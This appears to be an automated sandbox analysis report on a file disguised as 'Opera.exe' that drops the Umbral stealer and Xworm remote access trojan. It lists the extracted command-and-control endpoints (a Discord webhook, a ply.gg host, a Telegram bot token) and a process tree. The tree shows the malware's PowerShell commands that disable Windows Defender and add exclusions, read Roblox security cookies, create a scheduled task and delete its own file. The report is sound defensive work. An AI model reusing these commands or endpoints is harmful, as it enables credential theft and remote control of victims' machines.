Analysis

  • max time kernel
    599s
  • max time network
    602s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26-04-2024 13:15

General

  • Target

    Opera.exe

  • Size

    319KB

  • MD5

    f69924b642ac4b9ef1dfacdfd43759a9

  • SHA1

    95da50564c7cbc3749148419c68a08b0f2869ee1

  • SHA256

    d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

  • SHA512

    2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

  • SSDEEP

    6144:48loZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmiW2brXv5P:7oZRL+EP8DDUgoOJBiLHaIJtMQIL/5P

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Extracted

Family

xworm

C2

phentermine-partial.gl.at.ply.gg:36969

Attributes
  • Install_directory

    %AppData%

  • install_file

    Client.exe

  • telegram

    https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y

Signatures

  • Detect Umbral payload 5 IoCs
  • Detect Xworm Payload 5 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 13 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Opera.exe
    "C:\Users\Admin\AppData\Local\Temp\Opera.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
        3⤵
        • Views/modifies file attributes
        PID:2840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:8
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2128
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4852
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4384
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:3800
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:1428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3540
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:5252
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
            3⤵
              PID:4600
              • C:\Windows\system32\PING.EXE
                ping localhost
                4⤵
                • Runs ping.exe
                PID:5168
          • C:\Users\Admin\AppData\Local\Temp\XClient.exe
            "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
            2⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3172
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2892
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1224
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:5320
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:5916
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
              3⤵
              • Creates scheduled task(s)
              PID:5164
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            2⤵
            • Checks processor information in registry
            • Modifies registry class
            • NTFS ADS
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4404
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.0.785884306\520282606" -parentBuildID 20221007134813 -prefsHandle 1636 -prefMapHandle 1624 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2b27ca1-1d07-4130-9b46-2d90e87c56e6} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 1720 1f2931f4d58 gpu
              3⤵
                PID:2268
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.1.114254307\1143745263" -parentBuildID 20221007134813 -prefsHandle 2096 -prefMapHandle 2092 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97135303-6f31-474e-b0de-7fc9643e4482} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 2108 1f292b41958 socket
                3⤵
                  PID:3648
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.2.135195726\1258005419" -childID 1 -isForBrowser -prefsHandle 2760 -prefMapHandle 2968 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf445491-c395-438b-a880-e3f76ce4fac5} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 2944 1f297197558 tab
                  3⤵
                    PID:3964
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.3.693188196\2020291680" -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 3408 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca22dd52-3dad-478c-90d1-935503a1fdcf} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 3452 1f287e61f58 tab
                    3⤵
                      PID:3092
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.4.2076861460\1814433807" -childID 3 -isForBrowser -prefsHandle 4304 -prefMapHandle 4296 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1d24509-16a4-4d4a-bc21-c7a99d73984d} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4320 1f29921e358 tab
                      3⤵
                        PID:3660
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.5.784412914\1526721620" -childID 4 -isForBrowser -prefsHandle 4848 -prefMapHandle 4844 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc938f41-17fd-4a76-8870-7f37287291f8} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4800 1f287e62258 tab
                        3⤵
                          PID:5384
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.6.141288439\352932363" -childID 5 -isForBrowser -prefsHandle 4928 -prefMapHandle 4932 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {76de6abc-bcb3-4468-ba5a-dcc2db041487} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4884 1f299496758 tab
                          3⤵
                            PID:5392
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.7.319893757\1180504177" -childID 6 -isForBrowser -prefsHandle 5096 -prefMapHandle 5100 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c5b81f3-2add-45a9-8206-3932dd707e78} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4912 1f299496a58 tab
                            3⤵
                              PID:5400
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.8.538590279\47800966" -childID 7 -isForBrowser -prefsHandle 6088 -prefMapHandle 6084 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2943164-ddd4-4e86-942c-e19c63f1db72} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5540 1f29ae86e58 tab
                              3⤵
                                PID:5212
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.9.290925440\879106275" -childID 8 -isForBrowser -prefsHandle 4956 -prefMapHandle 4952 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a5e67f4-9c56-468d-825a-fecb32bd0cdb} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6132 1f29ae87a58 tab
                                3⤵
                                  PID:4908
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.10.1093434033\1828280291" -childID 9 -isForBrowser -prefsHandle 6216 -prefMapHandle 6240 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ce5add9-4239-41ba-9c63-2b03f8729b82} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6316 1f29ae89e58 tab
                                  3⤵
                                    PID:5236
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.11.752001682\1145238142" -childID 10 -isForBrowser -prefsHandle 6500 -prefMapHandle 5016 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {70a45c95-38f3-4407-a532-a9cf137d2957} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4992 1f29342f858 tab
                                    3⤵
                                      PID:5436
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.12.1289579916\1137941508" -childID 11 -isForBrowser -prefsHandle 5288 -prefMapHandle 6312 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {72cc7662-f316-4635-a009-a2a660b2e83d} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5180 1f299ba9958 tab
                                      3⤵
                                        PID:5816
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.13.240442987\989605971" -childID 12 -isForBrowser -prefsHandle 3972 -prefMapHandle 2504 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97f741b7-7816-4330-8aa9-1535bcb29030} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5196 1f29ad29158 tab
                                        3⤵
                                          PID:5440
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.14.1661367114\708816911" -childID 13 -isForBrowser -prefsHandle 10296 -prefMapHandle 10292 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {976df849-95bd-455c-94fb-fd8854218b3a} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 10304 1f29b124258 tab
                                          3⤵
                                            PID:5860
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.15.1886885090\1676064267" -childID 14 -isForBrowser -prefsHandle 10128 -prefMapHandle 2648 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df02ce31-9c5d-4658-830f-0efacaa4ad29} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6024 1f29af20458 tab
                                            3⤵
                                              PID:2988
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.16.967545651\1558656289" -childID 15 -isForBrowser -prefsHandle 10212 -prefMapHandle 10152 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5496fa6d-b453-4e7b-972d-4dbf8ca616aa} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 10160 1f29b2d2d58 tab
                                              3⤵
                                                PID:5160
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.17.293763883\1533402784" -childID 16 -isForBrowser -prefsHandle 4432 -prefMapHandle 4436 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {547af0a8-3666-4dd3-986d-86e1e6c5cd0b} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4324 1f29b2d3358 tab
                                                3⤵
                                                  PID:3864
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.18.1405195493\1341552779" -childID 17 -isForBrowser -prefsHandle 10128 -prefMapHandle 10148 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33ade00c-ce6a-45e1-a633-e0ecedf3674f} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 9856 1f29b309558 tab
                                                  3⤵
                                                    PID:5316
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.19.824604785\1969642871" -childID 18 -isForBrowser -prefsHandle 10364 -prefMapHandle 4560 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0bc3241-c8dc-4ebb-9cdc-239d78d8197a} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4620 1f2994d4e58 tab
                                                    3⤵
                                                      PID:2592
                                                • C:\Users\Admin\AppData\Roaming\Client.exe
                                                  C:\Users\Admin\AppData\Roaming\Client.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:5792
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                  1⤵
                                                    PID:2300
                                                  • C:\Users\Admin\Downloads\Opera.exe
                                                    "C:\Users\Admin\Downloads\Opera.exe"
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:5744
                                                    • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
                                                      2⤵
                                                      • Drops file in Drivers directory
                                                      • Executes dropped EXE
                                                      PID:3040
                                                      • C:\Windows\SYSTEM32\attrib.exe
                                                        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
                                                        3⤵
                                                        • Views/modifies file attributes
                                                        PID:5808
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
                                                        3⤵
                                                          PID:2540
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                          3⤵
                                                            PID:4216
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            3⤵
                                                              PID:32
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              3⤵
                                                                PID:2372
                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                "wmic.exe" os get Caption
                                                                3⤵
                                                                  PID:5648
                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                  "wmic.exe" computersystem get totalphysicalmemory
                                                                  3⤵
                                                                    PID:5180
                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                    "wmic.exe" csproduct get uuid
                                                                    3⤵
                                                                      PID:5808
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                      3⤵
                                                                        PID:3836
                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                        "wmic" path win32_VideoController get name
                                                                        3⤵
                                                                        • Detects videocard installed
                                                                        PID:2340
                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
                                                                        3⤵
                                                                          PID:5584
                                                                          • C:\Windows\system32\PING.EXE
                                                                            ping localhost
                                                                            4⤵
                                                                            • Runs ping.exe
                                                                            PID:5272
                                                                    • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                      C:\Users\Admin\AppData\Roaming\Client.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:4920
                                                                    • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                      C:\Users\Admin\AppData\Roaming\Client.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:1540
                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                      C:\Windows\system32\AUDIODG.EXE 0x2ec
                                                                      1⤵
                                                                        PID:1960
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:2300
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:3080
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:6092
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:6104
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:4392
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:3508
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:1788
                                                                      • C:\Windows\system32\browser_broker.exe
                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                        1⤵
                                                                        • Modifies Internet Explorer settings
                                                                        PID:4912
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5632
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies Internet Explorer settings
                                                                        • Modifies registry class
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5520
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        PID:404
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        PID:2340
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        PID:4892

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

                                                                        Filesize

                                                                        654B

                                                                        MD5

                                                                        16c5fce5f7230eea11598ec11ed42862

                                                                        SHA1

                                                                        75392d4824706090f5e8907eee1059349c927600

                                                                        SHA256

                                                                        87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

                                                                        SHA512

                                                                        153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

